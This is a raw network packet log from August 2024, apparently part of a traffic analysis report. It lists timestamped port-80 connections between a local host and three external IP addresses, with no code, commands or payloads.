Aug 27, 2024 14:20:23.082175016 CEST	80	52331	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:23.082187891 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:23.082295895 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.082490921 CEST	52331	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.082490921 CEST	52331	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.087328911 CEST	80	52331	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:23.452575922 CEST	80	52329	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:23.452672958 CEST	52329	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.452721119 CEST	52329	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.453457117 CEST	52332	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.458533049 CEST	80	52329	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:23.458545923 CEST	80	52332	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:23.458635092 CEST	52332	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.458836079 CEST	52332	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.463934898 CEST	80	52332	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:23.701318026 CEST	52331	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.701435089 CEST	52327	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:23.701463938 CEST	52332	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.702275991 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.704004049 CEST	52334	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:23.707598925 CEST	80	52333	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:23.707688093 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.707832098 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.709398031 CEST	80	52334	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:23.709458113 CEST	52334	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:23.709542990 CEST	52334	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:23.712656975 CEST	80	52333	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:23.714365005 CEST	80	52334	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:23.811269999 CEST	52335	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.817712069 CEST	80	52335	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:23.817800045 CEST	52335	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.817884922 CEST	52335	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:23.822736025 CEST	80	52335	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:24.430634975 CEST	80	52333	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:24.430805922 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.547329903 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.547636986 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.552508116 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:24.552606106 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.552720070 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.553229094 CEST	80	52333	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:24.553281069 CEST	52333	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:24.557512045 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.249069929 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.249202967 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.250020981 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.254765987 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.407114983 CEST	80	52335	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:25.407311916 CEST	52335	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:25.407342911 CEST	52335	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:25.409529924 CEST	52337	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:25.412198067 CEST	80	52335	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:25.414469957 CEST	80	52337	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:25.414546013 CEST	52337	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:25.414700031 CEST	52337	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:25.419461966 CEST	80	52337	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:25.500160933 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.500214100 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.608023882 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.608366013 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.613431931 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.613554955 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.613704920 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.613790035 CEST	80	52336	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:25.613840103 CEST	52336	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:25.618468046 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.330468893 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.330542088 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.331401110 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.336301088 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.575289965 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.575494051 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.686173916 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.686501026 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.691380024 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.691452980 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.691559076 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.691564083 CEST	80	52338	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:26.691612959 CEST	52338	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:26.696315050 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.017085075 CEST	80	52337	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.017158031 CEST	52337	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.017235041 CEST	52337	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.021970034 CEST	80	52337	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.125981092 CEST	52340	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.130937099 CEST	80	52340	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.131074905 CEST	52340	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.131203890 CEST	52340	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.135962963 CEST	80	52340	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.377721071 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.377821922 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.379753113 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.384567976 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.616321087 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.616419077 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.717643023 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.717938900 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.717983007 CEST	52340	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.718012094 CEST	52334	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:27.718839884 CEST	52342	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.722742081 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.722871065 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.722888947 CEST	80	52339	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.722986937 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.723041058 CEST	52339	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:27.723645926 CEST	80	52342	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.723712921 CEST	52342	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.723905087 CEST	52342	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:27.727798939 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:27.728746891 CEST	80	52342	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:27.828890085 CEST	52343	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:27.833998919 CEST	80	52343	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:27.834096909 CEST	52343	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:27.834265947 CEST	52343	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:27.839034081 CEST	80	52343	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:28.500401974 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:28.500497103 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.501068115 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.505935907 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:28.738847971 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:28.738970995 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.844348907 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.844646931 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.849450111 CEST	80	52341	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:28.849503040 CEST	52341	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.849723101 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:28.849786043 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.849899054 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:28.855823994 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.350003958 CEST	80	52342	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:29.350114107 CEST	52342	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:29.350205898 CEST	52342	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:29.358473063 CEST	80	52342	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:29.453866005 CEST	52345	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:29.463006973 CEST	80	52345	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:29.463124037 CEST	52345	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:29.463315964 CEST	52345	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:29.468271017 CEST	80	52345	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:29.555139065 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.555278063 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.556054115 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.567487955 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.799597979 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.799694061 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.905108929 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.905431986 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.910449028 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.910557032 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.910763979 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.910767078 CEST	80	52344	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:29.910828114 CEST	52344	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:29.917018890 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.601449966 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.601653099 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.604413033 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.609340906 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.839601994 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.839725971 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.951864958 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.952162981 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.957042933 CEST	80	52347	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.957109928 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.957258940 CEST	80	52346	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:30.957261086 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.957308054 CEST	52346	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:30.961987972 CEST	80	52347	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:31.060257912 CEST	80	52345	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.060353994 CEST	52345	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.060420036 CEST	52345	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.062494993 CEST	52348	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.065220118 CEST	80	52345	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.067378998 CEST	80	52348	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.067440033 CEST	52348	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.067532063 CEST	52348	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.074698925 CEST	80	52348	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.653793097 CEST	80	52347	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:31.653847933 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.654923916 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.659801006 CEST	80	52347	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:31.732621908 CEST	52343	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:31.732736111 CEST	52348	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.732772112 CEST	52347	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.735234022 CEST	52349	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:31.740108967 CEST	80	52349	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:31.740200043 CEST	52349	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:31.740360975 CEST	52349	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:31.746741056 CEST	80	52349	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:31.844419956 CEST	52350	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.844650984 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.849422932 CEST	80	52350	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.849451065 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:31.849571943 CEST	52350	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.849669933 CEST	52350	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:31.849677086 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.849766970 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:31.854619026 CEST	80	52350	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:31.855041027 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.591557026 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.591639996 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.594223976 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.599042892 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.828855038 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.828918934 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.936171055 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.936500072 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.945457935 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.945554018 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.945667982 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.945797920 CEST	80	52351	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:32.945852995 CEST	52351	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:32.955096960 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:33.453058958 CEST	80	52350	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:33.453161955 CEST	52350	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:33.453224897 CEST	52350	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:33.455811977 CEST	52353	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:33.458467960 CEST	80	52350	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:33.460890055 CEST	80	52353	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:33.460958958 CEST	52353	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:33.461045980 CEST	52353	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:33.482228994 CEST	80	52353	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:33.643146992 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:33.643232107 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:33.644013882 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:33.648866892 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:33.923774958 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:33.923842907 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.029938936 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.030232906 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.038948059 CEST	80	52352	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:34.039010048 CEST	52352	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.039402962 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:34.039470911 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.039596081 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.047936916 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:34.803417921 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:34.803483963 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.808568954 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:34.813415051 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.080777884 CEST	80	52353	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.081029892 CEST	52353	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.081029892 CEST	52353	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.085928917 CEST	80	52353	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.099842072 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.099905014 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.187643051 CEST	52356	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.192733049 CEST	80	52356	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.192823887 CEST	52356	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.192955017 CEST	52356	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.197731018 CEST	80	52356	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.201607943 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.201842070 CEST	52357	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.208286047 CEST	80	52357	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.208347082 CEST	52357	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.208386898 CEST	80	52354	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.208426952 CEST	52354	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.208477020 CEST	52357	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.215574026 CEST	80	52357	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.748193979 CEST	52357	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.748286009 CEST	52349	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:35.748331070 CEST	52356	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.749167919 CEST	52358	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.749174118 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.754015923 CEST	80	52358	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.754029989 CEST	80	52359	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.754113913 CEST	52358	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.754239082 CEST	52358	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:35.754240990 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.754281998 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:35.759028912 CEST	80	52358	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:35.759043932 CEST	80	52359	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:35.860325098 CEST	52360	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:35.865241051 CEST	80	52360	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:35.865310907 CEST	52360	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:35.865418911 CEST	52360	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:35.870209932 CEST	80	52360	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:36.561769962 CEST	80	52359	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:36.561897993 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.672513962 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.672708035 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.677606106 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:36.677680969 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.677782059 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.678035021 CEST	80	52359	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:36.678085089 CEST	52359	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:36.682522058 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.373404980 CEST	80	52358	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:37.373462915 CEST	52358	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:37.373533010 CEST	52358	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:37.378297091 CEST	80	52358	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:37.418644905 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.418715000 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.419312954 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.424081087 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.485070944 CEST	52362	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:37.489975929 CEST	80	52362	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:37.490071058 CEST	52362	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:37.490191936 CEST	52362	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:37.494906902 CEST	80	52362	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:37.724886894 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.724981070 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.826770067 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.827079058 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.831856012 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.831938982 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.832040071 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.832096100 CEST	80	52361	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:37.832145929 CEST	52361	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:37.837017059 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:38.586055040 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:38.586129904 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:38.588855982 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:38.593681097 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:38.834734917 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:38.834930897 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:38.936424971 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:38.936752081 CEST	52364	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.046405077 CEST	80	52364	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.046480894 CEST	52364	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.046524048 CEST	80	52363	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.046574116 CEST	52363	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.046746016 CEST	52364	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.051613092 CEST	80	52364	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.099915981 CEST	80	52362	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:39.100075006 CEST	52362	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.100075006 CEST	52362	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.102739096 CEST	52365	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.104969978 CEST	80	52362	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:39.107673883 CEST	80	52365	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:39.107748032 CEST	52365	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.107884884 CEST	52365	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.113733053 CEST	80	52365	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:39.739212990 CEST	80	52364	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.739310026 CEST	52364	80	192.168.2.6	185.208.158.116
